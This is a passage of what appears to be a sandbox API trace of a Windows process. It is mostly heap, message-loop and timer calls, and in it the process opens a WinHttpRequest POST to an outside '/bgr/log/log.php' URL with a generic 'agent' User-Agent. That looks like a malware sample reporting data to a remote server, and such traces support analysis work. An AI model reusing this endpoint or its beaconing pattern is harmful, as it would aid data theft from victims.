hHeap=0x850000, dwFlags=0x0, lpMem=0x891a18 | out: hHeap=0x850000) returned 1 [0279.248] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0d8 | out: hHeap=0x850000) returned 1 [0279.248] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e500 | out: hHeap=0x850000) returned 1 [0279.248] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919c8 | out: hHeap=0x850000) returned 1 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e500 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0d8 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919c8 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a120 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a138 [0279.248] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a108 | out: hHeap=0x850000) returned 1 [0279.248] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 1 [0279.248] TranslateMessage (lpMsg=0x75f02c) returned 0 [0279.248] DispatchMessageW (lpMsg=0x75f02c) returned 0x0 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20a) returned 0x8a2960 [0279.249] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a18 [0279.249] Shell_NotifyIconW (dwMessage=0x1, lpData=0x75e6c8) returned 1 [0279.250] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8a2960 | out: hHeap=0x850000) returned 1 [0279.250] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a18 | out: hHeap=0x850000) returned 1 [0279.250] KillTimer (hWnd=0xa0160, uIDEvent=0x1) returned 1 [0279.250] SetTimer (hWnd=0xa0160, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0279.250] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 0 [0279.250] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a18 [0279.250] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919d8 [0279.250] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20a) returned 0x8a2960 [0279.250] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919e8 [0279.250] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8a2960 | out: hHeap=0x850000) returned 1 [0279.250] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919e8 | out: hHeap=0x850000) returned 1 [0279.250] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919d8 | out: hHeap=0x850000) returned 1 [0279.250] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a18 | out: hHeap=0x850000) returned 1 [0279.250] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x38) returned 0x89cb10 [0279.250] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 0 [0279.250] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a18 [0279.250] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a108 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a18 | out: hHeap=0x850000) returned 1 [0279.251] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96aa38 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a108 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x89cb10 | out: hHeap=0x850000) returned 1 [0279.251] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a108 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96aa38 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88b318 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0f0 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0a8 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8750e0 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e4d8 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a138 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a120 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0d8 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919c8 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e500 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a060 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919b8 | out: hHeap=0x850000) returned 1 [0279.251] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a060 [0279.251] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0d8 [0279.251] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919b8 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a108 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919b8 | out: hHeap=0x850000) returned 1 [0279.251] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a108 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f88 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f70 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969fa0 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969fd0 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969fb8 | out: hHeap=0x850000) returned 1 [0279.251] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969fe8 | out: hHeap=0x850000) returned 1 [0279.252] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a000 | out: hHeap=0x850000) returned 1 [0279.252] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a018 | out: hHeap=0x850000) returned 1 [0279.252] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a030 | out: hHeap=0x850000) returned 1 [0279.252] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.252] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e488 | out: hHeap=0x850000) returned 1 [0279.252] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a048 [0279.252] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919b8 [0279.252] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x18) returned 0x972248 [0279.252] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xa) returned 0x96a030 [0279.252] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x896c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75f208*="Open", cNames=0x1, lcid=0x800, rgDispId=0x75f30c | out: rgDispId=0x75f30c*=1) returned 0x0 [0279.252] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a030 | out: hHeap=0x850000) returned 1 [0279.252] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x896c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x75f200 | out: ppTInfo=0x75f200*=0xa8727c) returned 0x0 [0279.258] ITypeInfo:RemoteGetTypeAttr (in: This=0xa8727c, ppTypeAttr=0x75f1f8, pDummy=0x356310 | out: ppTypeAttr=0x75f1f8, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.258] ITypeInfo:LocalGetIDsOfNames (This=0xa8727c) returned 0x0 [0279.258] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x0, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x8b1720 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x1, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x2, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x3, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x8b1720 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x4, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x8b1720 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x5, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x6, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x7, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x8b1720 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x8, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x8b1720 [0279.262] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x9, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.262] ITypeInfo:LocalReleaseTypeAttr (This=0xa8727c) returned 0xa377a8 [0279.262] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x8b1720 [0279.262] WinHttpRequest:IUnknown:Release (This=0xa8727c) returned 0x1 [0279.262] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x44) returned 0xa830c0 [0279.263] WinHttpRequest:IDispatch:Invoke (in: This=0x896c30, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f2f0*(rgvarg=([0]=0xa830c4*(varType=0xb, wReserved1=0x0, wReserved2=0x1724, wReserved3=0x8b, varVal1=0x0, varVal2=0x0), [1]=0xa830d4*(varType=0x8, wReserved1=0xa7, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xa830e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8, puArgErr=0x75f300 | out: pDispParams=0x75f2f0*(rgvarg=([0]=0xa830c4*(varType=0xb, wReserved1=0x0, wReserved2=0x1724, wReserved3=0x8b, varVal1=0x0, varVal2=0x0), [1]=0xa830d4*(varType=0x8, wReserved1=0xa7, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xa830e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f300*=0x2b5995) returned 0x0 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x972248 | out: hHeap=0x850000) returned 1 [0279.267] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0c0 [0279.267] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0f0 [0279.267] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a68 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa830c0 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919b8 | out: hHeap=0x850000) returned 1 [0279.267] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a048 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f28 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891998 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a090 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a078 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa2bd10 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a08 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0d8 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a060 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a108 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e4b0 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891988 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0f0 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a68 | out: hHeap=0x850000) returned 1 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.267] PeekMessageW (in: lpMsg=0x75f8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f8fc) returned 0 [0279.267] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a68 [0279.267] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a048 [0279.267] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891988 [0279.267] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0xac94a8 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e4b0 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a048 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0f0 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a108 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a060 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0d8 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a078 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a08 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a090 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a08 | out: hHeap=0x850000) returned 1 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0xa74868 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f28 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0c0 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a08 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a090 | out: hHeap=0x850000) returned 1 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a090 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a08 | out: hHeap=0x850000) returned 1 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96aa38 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a150 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a090 | out: hHeap=0x850000) returned 1 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0f0 | out: hHeap=0x850000) returned 1 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a108 | out: hHeap=0x850000) returned 1 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0d8 | out: hHeap=0x850000) returned 1 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a060 | out: hHeap=0x850000) returned 1 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a078 | out: hHeap=0x850000) returned 1 [0279.268] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e4b0 | out: hHeap=0x850000) returned 1 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a078 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a08 [0279.268] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x18) returned 0x972248 [0279.269] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x22) returned 0xa7ae40 [0279.269] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x896c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75f208*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x75f30c | out: rgDispId=0x75f30c*=2) returned 0x0 [0279.269] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa7ae40 | out: hHeap=0x850000) returned 1 [0279.269] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x896c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x75f200 | out: ppTInfo=0x75f200*=0xa8727c) returned 0x0 [0279.269] ITypeInfo:RemoteGetTypeAttr (in: This=0xa8727c, ppTypeAttr=0x75f1f8, pDummy=0x356310 | out: ppTypeAttr=0x75f1f8, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalGetIDsOfNames (This=0xa8727c) returned 0x0 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x0, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x1, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x2, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x3, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x4, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x5, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x6, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x7, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x8, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x9, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.269] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0xa, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.269] ITypeInfo:LocalReleaseTypeAttr (This=0xa8727c) returned 0xa377a8 [0279.270] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa51db0 [0279.270] WinHttpRequest:IUnknown:Release (This=0xa8727c) returned 0x1 [0279.270] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x34) returned 0xaa5118 [0279.270] WinHttpRequest:IDispatch:Invoke (in: This=0x896c30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f2f0*(rgvarg=([0]=0xaa511c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xaa512c*(varType=0x8, wReserved1=0x0, wReserved2=0x5abf, wReserved3=0x1b04, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8, puArgErr=0x75f300 | out: pDispParams=0x75f2f0*(rgvarg=([0]=0xaa511c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xaa512c*(varType=0x8, wReserved1=0x0, wReserved2=0x5abf, wReserved3=0x1b04, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f300*=0x2b5995) returned 0x0 [0279.270] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x972248 | out: hHeap=0x850000) returned 1 [0279.270] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a048 [0279.270] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0f0 [0279.270] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919b8 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xaa5118 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a078 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a08 | out: hHeap=0x850000) returned 1 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a078 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xac94a8 | out: 